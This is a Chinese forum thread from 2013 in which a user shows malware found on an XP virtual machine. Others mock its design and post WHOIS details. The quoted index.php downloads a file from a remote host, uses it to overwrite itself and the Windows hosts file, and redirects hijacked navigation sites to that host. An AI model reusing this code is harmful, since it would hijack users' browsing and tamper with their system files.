V2EX = way to explore

V2EX 是一个关于分享和探索的地方

已注册用户请登录

请不要在回答术问题时复制粘贴 AI 生成的内容

中毒了，我想吐槽一下，这个病毒是谁写的

jacy 2013-11-25 21:42:32 +08:00 12265 次点击

这是一个创建于 4338 天前的主题，其中的信息可能已经有所发展或是发生改变。

本人有个xp虚拟机，上面没装杀毒软件。有一次不知安装了什么，桌面上总是会自动创建某网站的快捷方式，然后看进程把几个exe删掉就好了。
看进程的时候发现有个apache，我想我没装过啊，而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录，也正常，不像是病毒伪装的。于是想看看是什么，浏览器输入localhost，结果跳转到了某个网站。于是想到hosts被改了，打开hosts，看到localhost是127.0.0.1，没问题啊，再往下一看，好多记录啊，常用的一些导航网站，下载网站，杀毒网站全被解析到了127.x.x.x，于是我似乎明白了什么。立马回到apache目录，发现居然还安装有php，打开htdocs，有个index.php和404.html，打开看了看，觉得这病毒作者很蛋疼啊，有必要为了劫持网站费这么多事嘛，把php和apache都给装上了，是哪个无证程序员写的啊。

贴index.php给大家看看（还自带注释的-_-||）：
<?php
include_once "config.php";
$name1 = "www.2345.com,2345.com";
$name2 = "www.tao123.com,tao123.com";
//$name3 = "www.hao123.com,hao123.com";

//获取最新php

$index = file_get_contents('http://www.129129.com/ht/index.txt');
if(strpos($index, '@')!==false)
{
$arr = explode("@", $index);

$index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
}

//获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化

$serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:http://www.129129.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:http://www.129129.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:http://www.129129.com/?3");exit;
break;
default:
header("Location:http://www.129129.com/?4");exit;
break;
}

?>
<meta http-equiv="refresh" cOntent="0;url=http://www.129129.com/?301">

config.php：
<?php
function get_rep($index)
{
return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
}
?>

index

PHP

hosts

46 条回复 1970-01-01 08:00:00 +08:00

shierji

2013-11-25 21:46:58 +08:00

原版才是正道啊……- -

imsuwj

2013-11-25 22:11:35 +08:00

很有想法。。。

soulgain

2013-11-25 22:20:40 +08:00

这恶意的方式好搞笑啊~~

AstroProfundis

2013-11-25 22:22:59 +08:00

莫名喜感是为啥...

zts1993

2013-11-25 22:23:23 +08:00

php程序员也可以写病毒啦，。。。。233333

likuku

2013-11-25 22:28:55 +08:00

虚拟机装好XP就立即安装MS官方的 security-essentials

pirex

2013-11-25 22:30:50 +08:00

好喜感。。

lizheming

2013-11-25 22:48:57 +08:00 via iPad

我想说这样能被杀毒软件检测出来么。感觉都是正常步骤额

Mutoo

2013-11-25 22:51:42 +08:00

Domain Name : 129129.com

Registrar: eName Technology Co.,Ltd.

注册人联系 Information :
LinYu
Xiamen eName Technology Co.,Ltd.

CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
tel: 86 4000400044
fax: 86 4000044400 5

管理人联系 Information :
LinYu
Xiamen eName Technology Co.,Ltd.

CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
tel: 86 4000400044
fax: 86 4000044400 5

技术联系 Information :
LinYu
Xiamen eName Technology Co.,Ltd.

CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
tel: 86 4000400044
fax: 86 4000044400 5

财务联系 Information :
LinYu
Xiamen eName Technology Co.,Ltd.

CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
tel: 86 4000400044
fax: 86 4000044400 5

状态：
clientDeleteProhibited
clientTransferProhibited

DNS服务器 :
F1G1NS1.DNSPOD.NET
F1G1NS2.DNSPOD.NET

创建时间 : 2010-10-27 18:50:02
过期时间 : 2015-10-27 18:50:02

=====

居然是厦门的，丢人啊。

kutata

2013-11-25 23:06:17 +08:00

因为这样写杀毒软件不杀？-_-||

DearMark

2013-11-25 23:14:30 +08:00

觉历，这个Apache装得秒，你还可以用一下。

0racleTink

2013-11-25 23:26:07 +08:00

确实啊，这样应该能躲过杀毒软件

yfdyh000

2013-11-25 23:34:44 +08:00

@Mutoo 那不是域名商信息吗？

plprapper

2013-11-25 23:49:57 +08:00

想当年学校里上 lamp课程的时候很多同学搞不定环境安装各种报错。。。。
哈哈把这个东西发给学校老师把，一键搞定。

raincious

2013-11-25 23:58:33 +08:00 via Android

好奇为什么不用nodejs写，又轻又小，再不济用php自己的服务器啊。

要是再把mysql装上就搞了。

yfdyh000

2013-11-26 00:01:21 +08:00

网页直接嵌入了 http://www.qq.net/129129_2.html ，页面修改自114la，很多都没改。
粤ICP备05021225号-5。这是雨林木风的？……

lhx2008

2013-11-26 06:59:07 +08:00

跳转的方法蛋疼，一眼就知道被劫持了把，而且改hosts不能过杀软

jianghu52

2013-11-26 07:57:29 +08:00

话说命名还挺规范的啊。

qonco

2013-11-26 09:14:25 +08:00

//域名跳转个性化

噗~

wheatcuican

2013-11-26 09:53:51 +08:00

居然装apache，噗~

wheatcuican

2013-11-26 09:54:30 +08:00

还自带注释，噗~

xiaket

2013-11-26 10:15:30 +08:00

真有创意...

sun019

2013-11-26 10:19:58 +08:00

创意啊不错收藏了

meta

2013-11-26 10:21:22 +08:00

这得多大一个体积的病毒啊。

wingoo

2013-11-26 10:48:10 +08:00

关键是杀毒软件不杀..

justfindu

2013-11-26 11:14:47 +08:00

还写注释~ 这习惯真好啊

tuzi

2013-11-26 11:23:14 +08:00

这思路绝了，可惜没用在正路上！

Legend

2013-11-26 11:31:07 +08:00

http://seasonwind.tmall.com/?kid=ad_002_CG_CPS_69210725547_www.taobao.com_2_2

refresh

2013-11-26 12:23:09 +08:00

难道杀毒软件不管个性hosts么，hosts需要权限吧

summic

2013-11-26 12:30:11 +08:00

思路牛逼，估计那家伙很快就会用几十k的webserver换掉apache和php

kfll

2013-11-26 12:40:53 +08:00 via iPhone

还好只是跳转……要是直接在本地搭钓鱼站……还能随时更新……简直……

josephok

2013-11-26 14:22:57 +08:00

lucker6666

2013-11-26 14:29:34 +08:00

@kfll 这思路 nb了

erse

2013-11-26 14:38:30 +08:00

牛逼的思路，这可以算是流量么？

kran

2013-11-26 14:57:33 +08:00

能把apache装上那简直是不容易了，手动安装我都嫌烦。。

zjgsamuel

2013-11-26 16:21:54 +08:00

这肉鸡使的学习了！！

tywtyw2002

2013-11-26 17:37:47 +08:00

我还见过一个木马呢，把某个webhosting的母鸡给入侵了。
自己编译了一个新的nginx，在这个nginx里面加入了功能，随机把网页302倒色情广告联盟，然后加上cookie，这样用户第二次访问就不会跳转了。。。。。
然后把老的nginx文件给替换成一个sh脚本。。。。

aivier

2013-11-26 17:42:01 +08:00

好吧，无敌了，竟然还可以这样写恶意软件。。。！

chengzi

2013-11-26 21:06:17 +08:00

注释好习惯

codegear

2013-11-26 23:23:37 +08:00 via Android

莫名的喜感啊！

laobubu

2013-11-26 23:58:03 +08:00 via Android

求病毒，一键部署apache啊！！

iqincai

2013-11-27 10:01:41 +08:00 via Android

好有喜感啊-.-

tioover

2013-11-27 19:41:47 +08:00

23333

Quaintjade

2013-11-27 20:37:31 +08:00

以前有笑话说用C#写个病毒还要先帮用户下载安装合适版本的.NET Framework，没想到还真有写个php病毒先帮用户安装apache和php的……

chens

2013-11-28 09:38:05 +08:00

思路挺牛x

yanwen

2013-12-16 12:06:58 +08:00

@tywtyw2002 好牛逼。。

关于帮助文档自助推广系统博客 API FAQ Solana 2586 人在线 最高记录 6679

Select Language

创意工作者们的社区

World is powered by solitude

VERSION: 3.9.8.5 26ms UTC 04:53 PVG 12:53 LAX 21:53 JFK 00:53
Do have faith in what you're doing.